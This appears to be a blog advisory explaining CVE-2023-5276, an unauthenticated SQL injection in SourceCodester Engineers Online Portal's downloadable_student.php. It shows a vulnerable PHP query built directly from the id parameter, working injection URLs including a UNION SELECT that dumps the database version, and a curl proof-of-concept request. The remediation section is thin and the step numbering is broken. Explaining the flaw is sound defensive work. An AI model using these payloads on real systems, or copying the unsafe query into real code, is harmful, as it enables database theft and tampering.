CVE-2023-5276 - Critical SQL Injection in SourceCodester Engineers Online Portal 1. Explained

A serious vulnerability—CVE-2023-5276—was found in the SourceCodester Engineers Online Portal version 1.. This flaw allows attackers to do a dangerous SQL injection through the downloadable_student.php file by manipulating the id parameter. If you run this web application, you’re at risk of attackers stealing or destroying data in your database.

In this post, we'll break down what this vulnerability is, how an attack works, the real code involved, and show you step-by-step how someone could exploit it. You'll also find references to the original research and mitigation tips.

What Is CVE-2023-5276?

CVE-2023-5276 is a unique identifier for a critical vulnerability found in Engineers Online Portal 1., made by SourceCodester. An attacker can inject malicious SQL into a request parameter, taking full control of the database backend. The bad code sits in downloadable_student.php, exactly where the web app expects a student id.

CVE and Database Entry:
- CVE-ID: CVE-2023-5276
- Vulnerability Database: VDB-240904

Where’s the Problem in the Code?

In the downloadable_student.php file, user input is taken directly from the URL or form—without filtering or escaping—and then used inside a SQL query. That’s a classic SQL injection setup.

Here’s a simplified snippet like what you’d find in the app

<?php
// downloadable_student.php
include('db.php');  // Connect to the database

$id = $_GET['id']; // User input from URL

$query = "SELECT * FROM students WHERE id = $id"; // BAD! No filtering here

$result = mysqli_query($conn, $query);
$row = mysqli_fetch_assoc($result);

// ... Display or use $row data
?>

Why is this bad?
The $id value from the URL is used directly in SQL, without quotes, type-checking, or escaping. If an attacker sends something besides a number, like 1 OR 1=1, the query suddenly looks like:

SELECT * FROM students WHERE id = 1 OR 1=1

That will return every student record, breaking security. Attackers can get even more creative, reading, changing, or deleting data.

How Easy Is It To Exploit?

An attacker doesn't need a login or special access. They can just use a browser or a tool like curl or Burp Suite. Here’s how a real attack might look:

Usually, the file is accessed with something like

http://target-site.com/downloadable_student.php?id=1

Now, an attacker changes the id value to SQL code

http://target-site.com/downloadable_student.php?id=1 OR 1=1

Step 3: See All Data

Instead of getting info for just one student, the site spits out all student records, or sometimes even sensitive info if you keep tweaking the injection.

To dump the database version

http://target-site.com/downloadable_student.php?id=1 UNION SELECT 1,@@version,3,4--

This SQL trick fetches the database version info, proving you can inject and control the backend.

Proof-of-Concept (PoC) Request with curl

curl "http://target-site.com/downloadable_student.php?id=1%20UNION%20SELECT%201,2,3,4--+"

If you see unexpected data or error messages, you know the site’s vulnerable.

It becomes possible to run further attacks (even remote code execution, in some cases).

No login or insider access is needed. The attack is remote and automatic.

How To Fix It

If you maintain this app—or any PHP/MySQL project—fixing this is urgent.

Review user access controls.

If you use SourceCodester’s code, check their repository for an update:
- SourceCodester Official Download

References and Further Reading

- Original VulDB Entry (VDB-240904)
- CVE Details - CVE-2023-5276
- OWASP SQL Injection Cheat Sheet
- PHP: SQL Injection - Manual

Final Thoughts

CVE-2023-5276 is a classic but devastating example of why it's critical to handle user input safely. This bug could allow hackers to take complete control of the Engineer’s Online Portal database, with just a simple URL tweak. If you're running this code, update or patch it NOW. And always use parameterized queries so you don’t end up on the next security bulletin.


Stay safe, and audit your code regularly!
If you have questions or need a more technical walk-through, leave a comment below.

Timeline

Published on: 09/29/2023 18:15:09 UTC
Last modified on: 11/07/2023 04:23:45 UTC